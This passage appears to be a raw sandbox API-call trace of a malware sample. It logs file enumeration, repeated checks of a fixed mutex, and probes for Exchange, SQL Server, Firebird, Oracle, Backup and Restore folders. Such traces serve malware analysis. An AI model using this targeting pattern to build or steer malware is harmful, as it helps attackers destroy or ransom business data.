lpFatTime=0x18ee84) returned 1 [0104.853] GlobalLock (hMem=0x450004) returned 0x591988 
[0104.853] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.855] GlobalUnlock (hMem=0x450004) returned 0 [0104.855] GlobalLock (hMem=0x450004) returned 0x591988 [0104.855] GlobalLock (hMem=0x45000c) returned 0x593998 [0104.855] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.855] GlobalUnlock (hMem=0x450004) returned 0 [0104.855] GlobalHandle (pMem=0x593998) returned 0x45000c [0104.855] GlobalUnlock (hMem=0x45000c) returned 0 [0104.855] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.856] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.856] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0104.856] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0104.856] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.856] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.856] GlobalUnlock (hMem=0x45000c) returned 0 [0104.856] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.856] GlobalLock (hMem=0x450004) returned 0x593998 [0104.856] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.856] GlobalUnlock (hMem=0x45000c) returned 0 [0104.856] GlobalHandle (pMem=0x593998) returned 0x450004 [0104.856] GlobalUnlock (hMem=0x450004) returned 0 [0104.856] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.856] 
FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a0ba500, ftCreationTime.dwHighDateTime=0x1c982ad, ftLastAccessTime.dwLowDateTime=0x6086b2d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4a0ba500, ftLastWriteTime.dwHighDateTime=0x1c982ad, nFileSizeHigh=0x0, nFileSizeLow=0x14e760, dwReserved0=0x0, dwReserved1=0x0, cFileName="DBGHELP.DLL", cAlternateFileName="")) returned 1 [0104.856] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0104.856] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0104.856] GlobalLock (hMem=0x450004) returned 0x591988 [0104.856] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.857] GlobalUnlock (hMem=0x450004) returned 0 [0104.857] GlobalLock (hMem=0x450004) returned 0x591988 [0104.857] GlobalLock (hMem=0x45000c) returned 0x593998 [0104.857] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.857] GlobalUnlock (hMem=0x450004) returned 0 [0104.857] GlobalHandle (pMem=0x593998) returned 0x45000c [0104.857] GlobalUnlock (hMem=0x45000c) returned 0 [0104.857] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.857] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8f7000, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdb9ec040, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2f8f7000, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0xf2b88, dwReserved0=0x0, dwReserved1=0x0, cFileName="DW20.EXE", cAlternateFileName="")) returned 1 [0104.857] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, 
lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0104.857] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0104.857] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.857] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.857] GlobalUnlock (hMem=0x45000c) returned 0 [0104.857] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.857] GlobalLock (hMem=0x450004) returned 0x593998 [0104.857] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.857] GlobalUnlock (hMem=0x45000c) returned 0 [0104.857] GlobalHandle (pMem=0x593998) returned 0x450004 [0104.857] GlobalUnlock (hMem=0x450004) returned 0 [0104.857] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.858] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5e4300, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdbe62980, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2e5e4300, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0x99ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DWTRIG20.EXE", cAlternateFileName="")) returned 1 [0104.858] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0104.858] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0104.858] GlobalLock (hMem=0x450004) returned 0x591988 [0104.858] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.858] GlobalUnlock (hMem=0x450004) returned 0 [0104.858] GlobalLock (hMem=0x450004) returned 0x591988 [0104.858] GlobalLock (hMem=0x45000c) returned 0x593998 [0104.858] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.858] 
GlobalUnlock (hMem=0x450004) returned 0 [0104.858] GlobalHandle (pMem=0x593998) returned 0x45000c [0104.858] GlobalUnlock (hMem=0x45000c) returned 0 [0104.858] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.858] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5e4300, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdbe62980, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2e5e4300, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0x99ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DWTRIG20.EXE", cAlternateFileName="")) returned 0 [0104.858] GetLastError () returned 0x12 [0104.858] FindClose (in: hFindFile=0x58b020 | out: hFindFile=0x58b020) returned 1 [0104.859] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQUATION", cAlternateFileName="")) returned 1 [0104.859] FileTimeToLocalFileTime (in: lpFileTime=0x18f1f8, lpLocalFileTime=0x18f104 | out: lpLocalFileTime=0x18f104) returned 1 [0104.859] FileTimeToDosDateTime (in: lpFileTime=0x18f104, lpFatDate=0x18f1c6, lpFatTime=0x18f1c4 | out: lpFatDate=0x18f1c6, lpFatTime=0x18f1c4) returned 1 [0104.859] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.859] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.859] GlobalUnlock (hMem=0x45000c) returned 0 [0104.859] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.859] GlobalLock (hMem=0x450004) returned 0x593998 
[0104.859] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.859] GlobalUnlock (hMem=0x45000c) returned 0 [0104.859] GlobalHandle (pMem=0x593998) returned 0x450004 [0104.859] GlobalUnlock (hMem=0x450004) returned 0 [0104.859] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.860] GlobalLock (hMem=0x450004) returned 0x591988 [0104.860] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.860] GlobalUnlock (hMem=0x450004) returned 0 [0104.860] GlobalLock (hMem=0x450004) returned 0x591988 [0104.860] GlobalLock (hMem=0x45000c) returned 0x593998 [0104.860] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.860] GlobalUnlock (hMem=0x450004) returned 0 [0104.860] GlobalHandle (pMem=0x593998) returned 0x45000c [0104.860] GlobalUnlock (hMem=0x45000c) returned 0 [0104.860] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.860] SysReAllocStringLen (in: pbstr=0x18f104*=0x0, psz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION", len=0x37 | out: pbstr=0x18f104*="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION") returned 1 [0104.860] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.860] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.860] GlobalUnlock (hMem=0x45000c) returned 0 [0104.860] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.860] GlobalLock (hMem=0x450004) returned 0x593998 [0104.860] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.860] GlobalUnlock (hMem=0x45000c) returned 0 [0104.861] GlobalHandle (pMem=0x593998) returned 0x450004 [0104.861] GlobalUnlock (hMem=0x450004) returned 0 [0104.861] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Microsoft\\Exchange Server", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, 
ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ࣈ쀀߿", cAlternateFileName="䱈@㐨W㏼W企@\x18㼔V\x18\x1b")) returned 0xffffffff [0104.861] GetLastError () returned 0x3 [0104.861] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.861] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d2c0, cbMultiByte=26, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0104.861] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=21, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\ct Edition\\ition\\") returned 21 [0104.862] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Microsoft SQL Server", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ࣈ쀀߿", cAlternateFileName="膴X䱠@㎌W企@\x18㽜V\x181")) returned 0xffffffff [0104.862] GetLastError () returned 0x2 [0104.862] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.862] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 
lpMultiByteStr=0x1e4d2c0, cbMultiByte=21, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0104.862] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=9, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\ct Edition\\ition\\") returned 9 [0104.862] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Firebird", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ࣈ쀀߿", cAlternateFileName="膴X䱠@V企@\x18㥔X\x18;")) returned 0xffffffff [0104.863] GetLastError () returned 0x2 [0104.863] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.863] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0104.863] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=8, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\ct Edition\\ition\\") returned 8 [0104.863] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MSSQL.1", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, 
ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ࣈ쀀߿", cAlternateFileName="膴X䱠@冄W企@\x18㨜X\x18D")) returned 0xffffffff [0104.863] GetLastError () returned 0x2 [0104.864] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.864] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=8, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\\x10") returned 8 [0104.864] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=37, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\ition\\") returned 37 [0104.864] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ࣈ쀀߿", cAlternateFileName="膴X䱠@㎌W企@\x18仔W\x18j")) returned 0xffffffff [0104.864] GetLastError () returned 0x2 [0104.864] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.864] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=37, lpWideCharStr=0x18dd84, 
cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\ition\\") returned 37 [0104.865] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\ition\\") returned 6 [0104.865] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Adobe", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ࣈ쀀߿", cAlternateFileName="膴X䱠@堬X企@\x18㥔X\x18q")) returned 0xffffffff [0104.865] GetLastError () returned 0x2 [0104.865] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.865] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="adobe\\仐Wp") returned 6 [0104.865] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\ition\\") returned 7 [0104.866] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Oracle", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, 
ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ࣈ쀀߿", cAlternateFileName="膴X䱠@℔W企@\x18㨜X\x18y")) returned 0xffffffff [0104.866] GetLastError () returned 0x2 [0104.866] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.866] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="oracle\\X\x10") returned 7 [0104.866] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\ition\\") returned 7 [0104.866] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Archive", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ࣈ쀀߿", cAlternateFileName="膴X䱠@V企@\x18㥔X\x18\x81")) returned 0xffffffff [0104.867] GetLastError () returned 0x2 [0104.867] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.867] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: 
lpWideCharStr="archiveX\x10") returned 7 [0104.867] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\ition\\") returned 6 [0104.867] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Backup", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ࣈ쀀߿", cAlternateFileName="膴X䱠@堬X企@\x18㨜X\x18\x88")) returned 0xffffffff [0104.867] GetLastError () returned 0x2 [0104.868] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.868] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="backup㥐X\x10") returned 6 [0104.868] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\ition\\") returned 6 [0104.868] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Reserv", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, 
ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ࣈ쀀߿", cAlternateFileName="膴X䱠@℔W企@\x18㥔X\x18\x8f")) returned 0xffffffff [0104.868] GetLastError () returned 0x2 [0104.918] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.918] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="reserv㨘X\x10") returned 6 [0104.918] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\ition\\") returned 7 [0104.918] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Restore", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ࣈ쀀߿", cAlternateFileName="膴X䱠@V企@\x18㨜X\x18\x97")) returned 0xffffffff [0104.919] GetLastError () returned 0x2 [0104.919] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.919] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="restoreX\x10") returned 7 [0104.919] GlobalLock (hMem=0x450004) returned 
0x591988 [0104.919] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.919] GlobalUnlock (hMem=0x450004) returned 0 [0104.919] GlobalLock (hMem=0x450004) returned 0x591988 [0104.919] GlobalLock (hMem=0x45000c) returned 0x593998 [0104.919] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.919] GlobalUnlock (hMem=0x450004) returned 0 [0104.919] GlobalHandle (pMem=0x593998) returned 0x45000c [0104.919] GlobalUnlock (hMem=0x45000c) returned 0 [0104.919] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.919] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0104.919] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=15, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\") returned 15 [0104.920] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.920] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0104.920] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79fe8, cbMultiByte=46, lpWideCharStr=0x18dd7c, cchWideChar=2047 | 